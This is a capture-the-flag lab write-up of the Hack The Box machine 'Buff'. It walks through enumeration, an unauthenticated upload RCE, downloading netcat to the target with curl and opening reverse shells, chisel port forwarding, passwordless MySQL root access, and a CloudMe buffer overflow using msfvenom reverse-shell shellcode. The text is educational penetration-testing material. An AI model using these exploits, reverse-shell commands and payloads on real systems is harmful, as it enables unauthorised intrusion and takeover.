Buff (HTB)

14 minute read


# Nmap 7.92 scan initiated Tue Nov 23 15:49:13 2021 as: nmap -Pn -sCV -p- -oN buff
Nmap scan report for
Host is up (0.074s latency).
Not shown: 65533 filtered tcp ports (no-response)
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 23 15:53:35 2021 -- 1 IP address (1 host up) scanned in 261.93 seconds


[tyco㉿4YE: ~/htb/buff/scans]$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt,sh -o gobuster -k

/img                  (Status: 301) [Size: 341] [-->]
/home.php             (Status: 200) [Size: 143] 
/about.php            (Status: 200) [Size: 5337]
/index.php            (Status: 200) [Size: 4969]
/profile              (Status: 301) [Size: 345] [-->]
/contact.php          (Status: 200) [Size: 4169]
/register.php         (Status: 200) [Size: 137] 
/feedback.php         (Status: 200) [Size: 4252]
/upload               (Status: 301) [Size: 344] [-->]
/upload.php           (Status: 200) [Size: 107] 
/edit.php             (Status: 200) [Size: 4282]
/license              (Status: 200) [Size: 18025]
/up.php               (Status: 200) [Size: 209] 
/packages.php         (Status: 200) [Size: 7791]                                                                      
/examples             (Status: 503) [Size: 1058]
/include              (Status: 301) [Size: 345] [-->]
/licenses             (Status: 403) [Size: 1203]
/facilities.php       (Status: 200) [Size: 5961]

unauthenticated remote code execution (RCE)

From the Contact page, I was able to enumerate that this gym website was mrb3n's Bro Hut (also says that on the tabs) running on Gym Management Software 1.0

The first search result was an unauthenticated RCE vulnerability on ExploitDB. The vulnerability lies in the /upload.php directory. There is an unauthenticated file upload that does not check for valid user sessions to upload files. This means that we can upload a malicious payload to get a reverse shell onto the system.

[tyco㉿4YE: ~/htb/buff/scans]$ python 48506.py

/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and wil
l be removed in the next release.                                                                                     
/vvvvvvvvvvvv \--------------------------------------,     
`^^^^^^^^^^^^ /============BOKU====================="      
[+] Successfully connected to webshell.

On Windows systems, this first things I do is run whoami /all and systeminfo to get what permissions the shaun user has, and enumerate the Windows version to see if there any vulnerabilities.

C:\xampp\htdocs\gym\upload> whoami /all

USER INFORMATION                                  

User Name  SID                                           
========== ==============================================
buff\shaun S-1-5-21-2277156429-3381729605-2640630771-1001


Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                     Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                    


Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
C:\xampp\htdocs\gym\upload> systeminfo

Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          shaun
Registered Organization:   
Product ID:                00329-10280-00000-AA218
Original Install Date:     16/06/2020, 14:05:58
System Boot Time:          23/11/2021, 23:58:05
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 19/06/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,430 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,268 MB
Virtual Memory: In Use:    2,531 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [02]: fe80::3db3:5dce:8187:de70
                                 [03]: dead:beef::20b
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

I copied this systeminfo output back to Kali to use a tool called Windows Exploit Suggester (WES). WES takes the output of systeminfo, and compares it to a database to see if there are vulnerabilities to exploit.

[tyco㉿4YE: ~/htb/buff]$ python windows-exploit-suggester.py --update

[*] initiating winsploit version 3.3...
[+] writing to file 2021-11-23-mssb.xls
[*] done
[tyco㉿4YE: ~/htb/buff]$ python windows-exploit-suggester.py --database 2021-11-23-mssb.xls --systeminfo systeminfo

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension                                              
[*] attempting to read from the systeminfo input file                                                                 
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities                                                              
[*] comparing the 0 hotfix(es) against the 160 potential bulletins(s) with a database of 137 known exploits
[*] there are now 160 remaining vulns                                                                                       

[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 10 64-bit'                                                                 

[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255

[E] MS16-129: Cumulative Security Update for Microsoft Edge (3199057) - Critical                        
[*]   https://www.exploit-db.com/exploits/40990/ -- Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution
[*]   https://github.com/theori-io/chakra-2016-11

[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)

[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato                                                                     
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation

[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC

[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC

[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*]   https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 Java Script Stack Walker Memory Corruption (MS15-056)
[*]   http://blog.skylined.nl/20161206001.html -- MSIE jscript9 Java Script Stack Walker memory corruption

[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)

[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*]   https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*]   https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC

[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*]   Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC

[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*]   https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*]   https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC

[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[*]   https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*]   https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC 

[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*]   https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)

[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[*]   https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC

[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[*]   https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC

[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[*]   https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC

manual enumeration

getting a new, better shell

Looking at the suggestions, I did not think any of these would work. Most of the ones listed here are for older Windows systems. I did go through each just to see if it was usable, but they did not look exploitable. Unfortunately, the shell you get from the initial exploit is very limited. I could not create or change directories, so I created another reverse shell within the current shell. The curl command was on Buff, so I could use it to transfer over the netcat executable.

[tyco㉿4YE: ~/htb/buff]$ locate nc.exe


The executable is located in /usr/share/windows-resources/binaries/nc.exe, so we are going to copy it over to my current directory and host a Python HTTP server to curl it from Buff machine.

[tyco㉿4YE: ~/htb/buff]$ cp /usr/share/windows-resources/binaries/nc.exe .
[tyco㉿4YE: ~/htb/buff]$ python3 -m http.server

Serving HTTP on port 8000 ( ...
PS C:\Users\shaun> curl -o nc.exe

With the netcat executable on the Buff machine, we are going to use it to create another reverse shell.

PS C:\Users\shaun> nc.exe 4445 -e powershell

Spawn a reverse shell back to your Kali IP, and set up a listener to pick it up.

[tyco㉿4YE:~/htb/buff]$ rlwrap nc -nvlp 4445

listening on [any] 4445 ...
connect to [] from (UNKNOWN) [] 50029
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

finding internal ports

Now with that all set up, I started to manually enumerate the system. I first started in the user shaun’s directory. I ran dir -s, which recursively goes through each folder in shaun’s home directory to see if there are any files in there. There were 2 files of interest: Tasks.bat and CloudMe_1112.exe.

PS C:\Users\shaun> dir -s

Directory: C:\Users\shaun\Documents
Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----       16/06/2020     22:26             30 Tasks.bat                                                              

Directory: C:\Users\shaun\Downloads
Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----       16/06/2020     16:26       17830824 CloudMe_1112.exe
PS C:\Users\shaun> type Documents\Tasks.bat
START C:/xampp/xampp_start.exe

A quick search of cloudme 1112 exploit showed a buffer overflow exploit for version 1.11.2 of CloudMe. This looks promising, and might be the route we head down.

I continued enumerating by seeing if there were services running internally on the system. I ran netstat -ano (-anob requires administrative rights).

netstat stands for network statistics, and shows informaton on ports and TCP/UDP connections. Running netstat by itself will only show ESTABLISHED connections, which means connections that are already connected. There are flags that can be used to show more details that will help with the enumeration.

  • -a: Shows ALL TCP/UDP connections
  • -n: shows IP instead of hostnames
  • -o: shows the process ID associated with the connection
  • -b: shows the executable that created the connection
PS C:\xampp\htdocs\gym\upload> netstat -ano

Active Connections

Proto  Local Address          Foreign Address        State
TCP               LISTENING       3204
TCP      CLOSE_WAIT      3204
TCP      ESTABLISHED     3204
TCP         BUFF:0                 LISTENING       1252
TCP         BUFF:0                 LISTENING       6900

The netstat command shows port 8080, which is what the gym website is running on. means that port 8080 is running on ALL network interfaces, which is how we can access the website on our browser. The Foreign Address column shows IP and port of remote conections. In this case, it is coming from my Kali IP. There are also 2 interesting ports being ran locally. One is MySQL, and another service running on 8888.

I also ran tasklist, which is a command to list the running processes on the system. There are 2 processes that were interesting to me. MySQL and CloudMe are running.

PS C:\xampp\htdocs\gym\upload> tasklist                                                                                                              
Image Name                     PID Session Name        Session#    Mem Usage                                          
========================= ======== ================ =========== ============ 
mysqld.exe                    1252                            0      4,444 K
CloudMe.exe                   8508                            0     18,024 K

reverse forwarding the internal ports

Normally on Linux, I would use SSH to forward these ports to my Kali machine, but this won’t work on Windows without providing credentials to the current account.

I used chisel to forward the local ports to my Kali machine. Download the Linux and Windows version. The Linux executable will be used as the server running on Kali, and the Windows executable is the client that will connect back to Kali.

SERVER (LINUX): ./chisel server --reverse --port 4445
CLIENT (WINDOWS): .\chisel.exe client R:3306:localhost:3306 R:8888:localhost:8888

With the chisel set up on Kali, run the chisel client to open up the two ports. You should see the connection work:

PS C:\Users\shaun> .\chisel.exe client R:3306:localhost:3306 R:8888:localhost:8888

2021/11/24 04:14:27 client: Connected (Latency 202.2782ms)
[tyco㉿4YE: ~/htb/buff]$ ./chisel server --reverse --port 4445
2021/11/23 19:58:56 server: Reverse tunnelling enabled
2021/11/23 19:58:56 server: Fingerprint TzUF5zd5ccYcMud5O5HpCFSfWdGxhN5+oDhVVkozBh0=
2021/11/23 19:58:56 server: Listening on
2021/11/23 20:03:02 server: session#1: tun: proxy#R:3306=>localhost:3306: Listening
2021/11/23 20:03:02 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening

MySQL database

Now, let’s access the MySQL database from our Kali machine

[tyco㉿4YE: ~/htb/buff]$ mysql -u root -p -h

Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 131
Server version: 10.4.11-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

We got in with the default root account that has no password!

MariaDB [(none)]> show databases;
| Database           |
| information_schema |
| mysql              |
| performance_schema |
| phpmyadmin         |
| table              |
| test               |
6 rows in set (1.146 sec)

MariaDB [table]> use phpmyadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

MariaDB [phpmyadmin]> show tables;
| Tables_in_phpmyadmin   |         
| pma__bookmark          |              
| pma__central_columns   |                                                                                            
| pma__column_info       |             
| pma__designer_settings |                                                                                            
| pma__export_templates  |           
| pma__favorite          |                                                                                            
| pma__history           |              
| pma__navigationhiding  |                                                                                            
| pma__pdf_pages         |         
| pma__recent            |                                                                                            
| pma__relation          |           
| pma__savedsearches     |                                                                                            
| pma__table_coords      |           
| pma__table_info        |                                                                                            
| pma__table_uiprefs     |      
| pma__tracking          |
| pma__userconfig        |
| pma__usergroups        |
| pma__users             |
19 rows in set (0.164 sec)

There was nothing interesting in the myphpadmin database, so I moved on to CloudMe. Let’s take a look at the PoC and see if the exploit works.

CloudMe service

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

# Start the CloudMe service and run the script.

import socket

target = ""

We see here that the exploit needs the CloudMe service running. We already have access to this service by using chisel, so all we have to do is run the script.

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload   += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload   += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload   += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload   += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload   += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload   += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload   += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload   += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload   += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload   += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload   += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload   += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload   += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

This portion of the exploit is the contents of the payload if you were to run the msfvenom command. We are going to modify this part with our own payload to get a reverse shell.

[tyco㉿4YE: ~/htb/buff]$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST= LPORT=4447 -b '\x00\x0A\x0D' -f python

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders                               
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai                                                                                                                                                                        
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes                                    
Final size of python file: 1712 bytes
buf =  b""                                                 
buf += b"\xdb\xd3\xd9\x74\x24\xf4\x58\xbb\xc1\x90\x6c\x82\x29"
buf += b"\xc9\xb1\x52\x83\xc0\x04\x31\x58\x13\x03\x99\x83\x8e"
buf += b"\x77\xe5\x4c\xcc\x78\x15\x8d\xb1\xf1\xf0\xbc\xf1\x66"
buf += b"\x71\xee\xc1\xed\xd7\x03\xa9\xa0\xc3\x90\xdf\x6c\xe4"
buf += b"\x11\x55\x4b\xcb\xa2\xc6\xaf\x4a\x21\x15\xfc\xac\x18"
buf += b"\xd6\xf1\xad\x5d\x0b\xfb\xff\x36\x47\xae\xef\x33\x1d"
buf += b"\x73\x84\x08\xb3\xf3\x79\xd8\xb2\xd2\x2c\x52\xed\xf4"
buf += b"\xcf\xb7\x85\xbc\xd7\xd4\xa0\x77\x6c\x2e\x5e\x86\xa4"
buf += b"\x7e\x9f\x25\x89\x4e\x52\x37\xce\x69\x8d\x42\x26\x8a"
buf += b"\x30\x55\xfd\xf0\xee\xd0\xe5\x53\x64\x42\xc1\x62\xa9"
buf += b"\x15\x82\x69\x06\x51\xcc\x6d\x99\xb6\x67\x89\x12\x39"
buf += b"\xa7\x1b\x60\x1e\x63\x47\x32\x3f\x32\x2d\x95\x40\x24"
buf += b"\x8e\x4a\xe5\x2f\x23\x9e\x94\x72\x2c\x53\x95\x8c\xac"
buf += b"\xfb\xae\xff\x9e\xa4\x04\x97\x92\x2d\x83\x60\xd4\x07"
buf += b"\x73\xfe\x2b\xa8\x84\xd7\xef\xfc\xd4\x4f\xd9\x7c\xbf"
buf += b"\x8f\xe6\xa8\x10\xdf\x48\x03\xd1\x8f\x28\xf3\xb9\xc5"
buf += b"\xa6\x2c\xd9\xe6\x6c\x45\x70\x1d\xe7\x60\x8f\x13\xf8"
buf += b"\x1c\x8d\x2b\x17\x82\x18\xcd\x7d\x2c\x4d\x46\xea\xd5"
buf += b"\xd4\x1c\x8b\x1a\xc3\x59\x8b\x91\xe0\x9e\x42\x52\x8c"
buf += b"\x8c\x33\x92\xdb\xee\x92\xad\xf1\x86\x79\x3f\x9e\x56"
buf += b"\xf7\x5c\x09\x01\x50\x92\x40\xc7\x4c\x8d\xfa\xf5\x8c"
buf += b"\x4b\xc4\xbd\x4a\xa8\xcb\x3c\x1e\x94\xef\x2e\xe6\x15"
buf += b"\xb4\x1a\xb6\x43\x62\xf4\x70\x3a\xc4\xae\x2a\x91\x8e"
buf += b"\x26\xaa\xd9\x10\x30\xb3\x37\xe7\xdc\x02\xee\xbe\xe3"
buf += b"\xab\x66\x37\x9c\xd1\x16\xb8\x77\x52\x26\xf3\xd5\xf3"
buf += b"\xaf\x5a\x8c\x41\xb2\x5c\x7b\x85\xcb\xde\x89\x76\x28"
buf += b"\xfe\xf8\x73\x74\xb8\x11\x0e\xe5\x2d\x15\xbd\x06\x64"

I copied the command from the exploit, and modified the -p flag. I changed it to a regular reverse shell, and added my Kali IP and port to connect.

[tyco㉿4YE: ~/htb/buff]$ python 48389
Traceback (most recent call last):
  File "48389", line 50, in <module>
    overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
NameError: name 'payload' is not defined

One thing to note here is that this won’t work right away. When you run the exploit, it will error out and say that the variable payload is not defined. We can fix this by adding payload = buf at the end of the payload so that it will run.

[tyco㉿4YE:~/htb/buff]$ nc -nvlp 4447
listening on [any] 4447 ...
connect to [] from (UNKNOWN) [] 50029
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.